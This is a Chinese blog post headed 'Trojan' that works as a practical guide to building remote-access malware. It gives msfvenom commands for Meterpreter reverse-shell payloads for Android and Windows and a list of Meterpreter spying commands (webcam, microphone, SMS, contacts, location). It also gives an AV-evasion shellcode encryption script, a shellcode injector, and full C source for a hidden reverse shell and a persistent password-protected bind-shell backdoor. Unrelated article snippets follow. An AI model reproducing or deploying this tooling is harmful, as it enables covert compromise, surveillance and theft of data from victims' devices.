Trojan

原創 钞sir 2020-06-16 14:37

msfvenom

msfconsole

use exploit/multi/handler
set payload ****/meterpreter/reverse_tcp 
show options 
set LHOST=192.168.0.106
set LHOST 192.168.0.106
set LPORT 5555

android

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 R > ./shell.apk

help:

Stdapi: Webcam Commands
===================================
    webcam_list  列出網絡攝像頭
    record_mic [ˈrekərd]/記錄/  從默認麥克風錄製音頻爲X秒
    webcam_chat  開始視頻聊天
    webcam_snap  從指定的攝像頭獲取快照
    webcam_stream -i 1  從指定的網絡攝像頭播放視頻流[選擇後攝像頭]
Android Commands
=================
	activity_start  從URI字符串啓動Android活動
	check_root  檢查設備是否有根
	dump_calllog  獲取調用日誌
	dump_contacts  獲取聯繫人列表
	dump_sms  獲取短信
	geolocate  利用地理定位獲取當前LAT
	wlan_geolocate  利用WLAN信息獲取當前LAT
	hide_app_icon  從發射器隱藏應用程序圖標
	interval_collect  管理區間收集能力
	send_sms  從目標會話發送短消息
	set_audio_mode
	sqlite_query  從存儲庫查詢SQLite數據庫
	wakelock  啓用/禁用Wakelock

windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 -f exe -o shell.exe

1

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' LHOST=192.168.0.106 LPORT=5555 -f raw -o shellcode.raw

wget https://github.com/clinicallyinane/shellcode_launcher/blob/master/shellcode_launcher.exe
shellcode_launcher.exe -i shellcode.raw

2

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' LHOST=192.168.0.106 LPORT=5555 -f raw -o shellcode.raw

git clone https://github.com/Arno0x/ShellcodeWrapper
cd ShellcodeWrapper
python shellcode_encoder.py -cpp -cs -py shellcode.raw sir_123 xor

shellcode_encoder.py python3

#!/usr/bin/python3
# -*- coding: utf8 -*-
#
# Author: Arno0x0x, Modify: cc-sir
#

import argparse
from Crypto.Hash import MD5
from Crypto.Cipher import AES
import pyscrypt
from base64 import b64encode
from os import urandom
from string import Template
import os

templates = {
	'cpp': './templates/encryptedShellcodeWrapper.cpp',
	'csharp': './templates/encryptedShellcodeWrapper.cs',
	'python': './templates/encryptedShellcodeWrapper.py'
}

resultFiles = {
	'cpp': './result/encryptedShellcodeWrapper.cpp',
	'csharp': './result/encryptedShellcodeWrapper.cs',
	'python': './result/encryptedShellcodeWrapper.py'
}

# data as a bytearray
# key as a string
def xor(data, key):
	l = len(key)
	keyAsInt = list(map(ord, key))
	return bytes(bytearray((
	    (data[i] ^ keyAsInt[i % l]) for i in range(0,len(data))
	)))

#------------------------------------------------------------------------
def pad(s):
	"""PKCS7 padding"""
	return s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size)

#------------------------------------------------------------------------
def aesEncrypt(clearText, key):

	# Generate a crypto secure random Initialization Vector
	iv = urandom(AES.block_size)

	# Perform PKCS7 padding so that clearText is a multiple of the block size
	clearText = pad(clearText)

	cipher = AES.new(key, AES.MODE_CBC, iv)
	return iv + cipher.encrypt(bytes(clearText))

def convertFromTemplate(parameters, templateFile):
	try:
		with open(templateFile) as f:
			src = Template(f.read())
			result = src.substitute(parameters)
			f.close()
			return result
	except IOError:
		print (color("[!] Could not open or read template file [{}]".format(templateFile)))
		return None

def formatCPP(data, key, cipherType):
	shellcode = "\\x"
	shellcode += "\\x".join(format(b,'02x') for b in data)
	result = convertFromTemplate({'shellcode': shellcode, 'key': key, 'cipherType': cipherType}, templates['cpp'])

	if result != None:
		try:
			fileName = os.path.splitext(resultFiles['cpp'])[0] + "_" + cipherType + os.path.splitext(resultFiles['cpp'])[1]
			with open(fileName,"w+") as f:
				f.write(result)
				f.close()
				print (color("[+] C++ code file saved in [{}]".format(fileName)))
		except IOError:
			print (color("[!] Could not write C++ code  [{}]".format(fileName)))

# data as a bytearray
def formatCSharp(data, key, cipherType):
	shellcode = '0x'
	shellcode += ',0x'.join(format(b,'02x') for b in data)
	result = convertFromTemplate({'shellcode': shellcode, 'key': key, 'cipherType': cipherType}, templates['csharp'])

	if result != None:
		try:
			fileName = os.path.splitext(resultFiles['csharp'])[0] + "_" + cipherType + os.path.splitext(resultFiles['csharp'])[1]
			with open(fileName,"w+") as f:
				f.write(result)
				f.close()
				print (color("[+] C# code file saved in [{}]".format(fileName)))
		except IOError:
			print (color("[!] Could not write C# code  [{}]".format(fileName)))

#------------------------------------------------------------------------
# data as a bytearray
def formatPy(data, key, cipherType):
	shellcode = '\\x'
	shellcode += '\\x'.join(format(b,'02x') for b in data)
	result = convertFromTemplate({'shellcode': shellcode, 'key': key, 'cipherType': cipherType}, templates['python'])

	if result != None:
		try:
			fileName = os.path.splitext(resultFiles['python'])[0] + "_" + cipherType + os.path.splitext(resultFiles['python'])[1]
			with open(fileName,"w+") as f:
				f.write(result)
				f.close()
				print (color("[+] Python code file saved in [{}]".format(fileName)))
		except IOError:
			print (color("[!] Could not write Python code  [{}]".format(fileName)))

# data as a bytearray
def formatB64(data):
	return b64encode(data)

def color(string, color=None):
    """
    Author: HarmJ0y, borrowed from Empire
    Change text color for the Linux terminal.
    """
    
    attr = []
    # bold
    attr.append('1')
    
    if color:
        if color.lower() == "red":
            attr.append('31')
        elif color.lower() == "green":
            attr.append('32')
        elif color.lower() == "blue":
            attr.append('34')
        return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)

    else:
        if string.strip().startswith("[!]"):
            attr.append('31')
            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
        elif string.strip().startswith("[+]"):
            attr.append('32')
            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
        elif string.strip().startswith("[?]"):
            attr.append('33')
            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
        elif string.strip().startswith("[*]"):
            attr.append('34')
            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
        else:
            return string

if __name__ == '__main__':
	#------------------------------------------------------------------------
	# Parse arguments
	parser = argparse.ArgumentParser()
	parser.add_argument("shellcodeFile", help="File name containing the raw shellcode to be encoded/encrypted")
	parser.add_argument("key", help="Key used to transform (XOR or AES encryption) the shellcode")
	parser.add_argument("encryptionType", help="Encryption algorithm to apply to the shellcode", choices=['xor','aes'])
	parser.add_argument("-b64", "--base64", help="Display transformed shellcode as base64 encoded string", action="store_true")
	parser.add_argument("-cpp", "--cplusplus", help="Generates C++ file code", action="store_true")
	parser.add_argument("-cs", "--csharp", help="Generates C# file code", action="store_true")
	parser.add_argument("-py", "--python", help="Generates Python file code", action="store_true")
	args = parser.parse_args() 

	# Check that required directories and path are available, if not create them
	if not os.path.isdir("./result"):
		os.makedirs("./result")
		print (color("[+] Creating [./result] directory for resulting code files"))

	# Open shellcode file and read all bytes from it
	try:
		with open(args.shellcodeFile,"rb") as shellcodeFileHandle:
			shellcodeBytes = bytearray(shellcodeFileHandle.read())
			shellcodeFileHandle.close()
			print (color("[*] Shellcode file [{}] successfully loaded".format(args.shellcodeFile)))
	except IOError:
		print (color("[!] Could not open or read file [{}]".format(args.shellcodeFile)))
		quit()

	print (color("[*] MD5 hash of the initial shellcode: [{}]".format(MD5.new(shellcodeBytes).hexdigest())))
	print (color("[*] Shellcode size: [{}] bytes".format(len(shellcodeBytes))))

	# Perform AES128 transformation
	if args.encryptionType == 'aes':
		# Derive a 16 bytes (128 bits) master key from the provided key
		key = pyscrypt.hash(args.key, "saltmegood", 1024, 1, 1, 16)
		masterKey = formatB64(key)
		print (color("[*] AES encrypting the shellcode with 128 bits derived key [{}]".format(masterKey)))
		transformedShellcode = aesEncrypt(shellcodeBytes, key)
		cipherType = 'aes'

	# Perform XOR transformation
	elif args.encryptionType == 'xor':
		masterKey = args.key
		print (color("[*] XOR encoding the shellcode with key [{}]".format(masterKey)))
		transformedShellcode = xor(shellcodeBytes, masterKey)
		cipherType = 'xor'

	# Display interim results
	print ("\n==================================== RESULT ====================================\n")
	print (color("[*] Encrypted shellcode size: [{}] bytes".format(len(transformedShellcode))))

	# Display formated output
	if args.base64:
		print (color("[*] Transformed shellcode as a base64 encoded string"))		
		print (formatB64(transformedShellcode))
		print ("")
	
	if args.cplusplus:
		print (color("[*] Generating C++ code file"))
		formatCPP(transformedShellcode, masterKey, cipherType)
		print ("")
		

	if args.csharp:
		print (color("[*] Generating C# code file"))
		formatCSharp(transformedShellcode, masterKey, cipherType)
		print ("")

	if args.python:
		print (color("[*] Generating Python code file"))
		formatPy(transformedShellcode, masterKey, cipherType)
		print ("")

3

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 -f c -o msf.txt

code:

cat msf.txt|grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

wget https://github.com/DimopoulosElias/SimpleShellcodeInjector/raw/master/SimpleShellcodeInjector.c
i686-w64-mingw32-gcc SimpleShellcodeInjector.c -o ssi.exe
ssi.exe code

ssi

反向鏈接

//#include "stdafx.h"
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"advapi32.lib")
#pragma comment(lib,"user32.lib")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")

int _tmain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR LpszCmdLine,int nCmdShow)
{
	WSADATA wd;
	SOCKET sock;
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	struct sockaddr_in sin;
	char IP[16]="172.16.217.1\x00"; //ip
	unsigned short port=1234; // port
	memset(&si,0,sizeof(si));
	WSAStartup(MAKEWORD(1,1),&wd);
	sock = WSASocket(PF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
	sin.sin_family = AF_INET;
	sin.sin_port = htons(port);
	sin.sin_addr.s_addr = inet_addr(IP);

	connect(sock,(struct sockaddr*)&sin,sizeof(sin));
	si.cb = sizeof(si);
	si.dwFlags = STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES;
	si.wShowWindow = SW_HIDE;
	si.hStdInput = si.hStdOutput = si.hStdError = (void *)sock;
	CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,0,NULL,&si,&pi);
	return 0;
}

主動鏈接

//#include "stdafx.h"
#include <winsock2.h>
#include <Windows.h>
#include <string.h>
#pragma comment(lib,"ws2_32.lib")
#define MasterPort 999
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") 
//windows控制檯程序不出黑窗口
int add_reg(){ //添加自啓動
	char regname[] = "SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run";
	//"Software\\Microsoft\\Windows\\CurrentVersion\\Run";
	HKEY hkResult;
	int ret;
	ret = RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult);
	//ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regname, 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hkResult);
	ret = RegSetValueEx(hkResult,"MiniMuma",0,REG_EXPAND_SZ,(unsigned char *)"C:\\Windows\\MiniMuma.exe",25);
	
	char modlepath[256];
	char syspath[256];
	GetModuleFileName(0,modlepath,256); //獲得程序名字
	ret = CopyFile(modlepath,strcat(syspath,"C:\\Windows\\MiniMuma.exe"),1);
	return 0;
}


int _tmain(int argc, _TCHAR* argv[])
{
    WSADATA WSADa;
    sockaddr_in SockAddrIn;
    SOCKET CSocket,SSocket;
    int iAddrSize;
    PROCESS_INFORMATION ProcessInfo;
	STARTUPINFO StartupInfo;
	char szCMDPath[255];
	char Pass[256];
	add_reg();
	while(1){
		ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION));
		ZeroMemory(&StartupInfo,sizeof(STARTUPINFO));
		ZeroMemory(&WSADa,sizeof(WSADATA));
		ZeroMemory(&Pass,sizeof(Pass));

		GetEnvironmentVariable("COMSPEC",szCMDPath,sizeof(szCMDPath));
		WSAStartup(0x0202,&WSADa);
	
		SockAddrIn.sin_family = AF_INET;
		SockAddrIn.sin_addr.s_addr = INADDR_ANY;
		SockAddrIn.sin_port = htons(MasterPort);
		CSocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);

		bind(CSocket,(sockaddr *)&SockAddrIn,sizeof(SockAddrIn));

		listen(CSocket,1);
		iAddrSize = sizeof(SockAddrIn);
		SSocket = accept(CSocket,(sockaddr *)&SockAddrIn,&iAddrSize);
		StartupInfo.cb = sizeof(STARTUPINFO);
		StartupInfo.wShowWindow = SW_HIDE;
		StartupInfo.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
		StartupInfo.hStdError = (HANDLE)SSocket;
		StartupInfo.hStdInput = (HANDLE)SSocket;
		StartupInfo.hStdOutput = (HANDLE)SSocket;
		int ret,ret2;
		recv(SSocket,Pass,256,0);
		ret = strcmp(Pass,"cc_sir\n");	//Passwd
		ret2 = strcmp(Pass,"quite\n");	//quite
		
		if(ret == 0){
			CreateProcess(NULL,szCMDPath,NULL,NULL,TRUE,0,NULL,NULL,&StartupInfo,&ProcessInfo);
			WaitForSingleObject(ProcessInfo.hProcess,INFINITE);
			CloseHandle(ProcessInfo.hProcess);
			CloseHandle(ProcessInfo.hThread);

			closesocket(CSocket);
			closesocket(SSocket);
			WSACleanup();
		}
		else if(ret2 == 0){
			send(SSocket,"MiniMuma quite!\n",sizeof("MiniMuma quite!\n"),0);
			closesocket(CSocket);
			closesocket(SSocket);
			WSACleanup();
			break;
		}
		else{
			send(SSocket,"Passwd is Error!\n",sizeof("Passwd is Error!\n"),0);
			closesocket(CSocket);
			closesocket(SSocket);
			WSACleanup();
		}
	}
	return 0;
}
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

國王和電烤箱

 國王和電烤箱   有一次,在離這兒不遠的一個王國裏,國王把他的兩個顧問叫來,讓他們看一個閃閃發光的 金屬盒子。盒子頂上有兩個開口,旁邊有一個旋鈕和一個手柄。 “你們知道這是什麼嗎?”國王問。 一個顧問——他是一名工程師——搶先回答

cnssk 2020-07-07 14:41:56

perl 常用處理函數

 最近,由於項目需要,需要利用Perl把MYSQL數據庫中的某些表的數據輸出到Excel文件中方便打印,備份保存和數據移動。(由於之前未用過Perl,所以學了一下)。     需求描述:使用Perl從數據庫中取出數據,把數據輸出到Ex

wangxingbao4227 2020-07-07 06:40:27

星際譯王(StarDic)音標亂碼問題的解決

http://stardict.sourceforge.net/FAQ Q) How the show the correct phonetics in some babylon dictionaries? A) Download ht

dragon1225 2020-07-06 12:39:45

Response.ContentType+詳細列表

不同的ContentType 會影響客戶端所看到的效果.默認的ContentType爲 text/html 也就是網頁格式. 代碼如:<% resp

zzq58157383 2020-07-06 11:57:36

支付寶異步通知notify_url 與 同步通知return_url的區別

1、文件列表:alipay_config.php    (基本參數配置頁面,填寫商家的支付寶安全校驗碼,合作id,支付寶帳號等內容)index.php            (提供給商家的接入頁面,包含了物流信息,商品信息等內容)retu

YF_x 2020-07-06 05:46:12

一些嵌入式開發所需工具

Altium Designer Winter 09 KEIL4 FOR C51  KEIL註冊機 PROTEUS_7.10

研创物联 2020-07-06 02:59:32

Jenkins部署Maven項目時提示找不到JDK問題的解決方案

背景描述 今天我將一個Maven Web項目在Jenkins中配置自動構建部署時,遇到報錯: [ERROR] Failed to execute goal org.apache.maven.plugins:maven-compile

alanzyy 2020-07-05 16:04:13

dedeCMS中單獨調用子欄目模板和子欄目的文章時修改源代碼給channel和chanenartllist加上limit

在網站文件中找到include-taglib-chanel.lib.php,和chaneartllist.lib.php 下載用php的IDE打開, chanel.php加入limit屬性修改如下 <?php /** * 獲取欄目列表

认真你就赢了 2020-07-05 14:17:43

Cocos2d-xvision3.0加載失敗,和,Vs2012環境搭建

1.安裝好VS2012,下載Cocos2d-x3.0 雙擊擊win32 sln運行VS2012 如果加載失敗點擊程序運行,輸入devenv.exe /resetuserdata 回車,然後再進入VS,就是初始化後的了。 加載成功如下圖:

认真你就赢了 2020-07-05 14:17:43

Chrome無法使用Unity Web Player的解決方案

在Chrome更新42版本後,由於NPAPI被禁用,Unity Web Player等也被禁用,導致部分網頁遊戲無法運行。 在chrome地址欄輸入chrome://flags/按ctrl+F,查找NPAPI單擊NPAPI插件下方的“啓

地狱为王 2020-07-05 08:55:54

eclipse提示An SWT error has occurred 怎麼處理?

百度到N種解決方法,然而並沒有什麼卵用……最後,我覺得可能是軟件衝突,想了一下最近安裝的軟件,於是卸了MAYA,MAX,Apple相關軟件,WAMP,MYSQL,百度所有產品,驅動精靈,然後,清掉eclipse所有文件,重新安裝eclip

地狱为王 2020-07-05 08:55:54

Hello,World ! 我的第一個 C 程序

#include <stdio.h> int main() {     /* 我的第一個 C 程序 */     printf("Hello, World! \n");     return 0; }

炸裂且呵呵-_ 2020-07-05 04:40:38

Linux下apache性能配置調優

Apache 性能配置優化 ###httpd 相關查看命令瞭解 查看當前安裝模塊mpm(多路處理器) [root@localhost ~]# httpd -l 查看httpd進程數(即各個mpm模式下Apache能夠處理的併發請求數) [

炸裂且呵呵-_ 2020-07-05 04:40:38

docker安裝配置Haproxy

Haproxy 安裝及配置 docker部署HAproxy: mkdir -p /opt/haproxy docker run -d --restart=always -p 6443:6443 -p 9999:9999 --name ha

炸裂且呵呵-_ 2020-07-05 04:40:38

秒級的時間換算

1s  (秒)1ms (毫秒)   1毫秒 = 0.001秒 = 10-3秒(millisecond) 1μs (微秒)   1微秒 = 0.000001秒 = 10-6秒(microsecond) 1ns (納秒)   1納秒 = 0.

kmajian 2020-07-05 01:32:14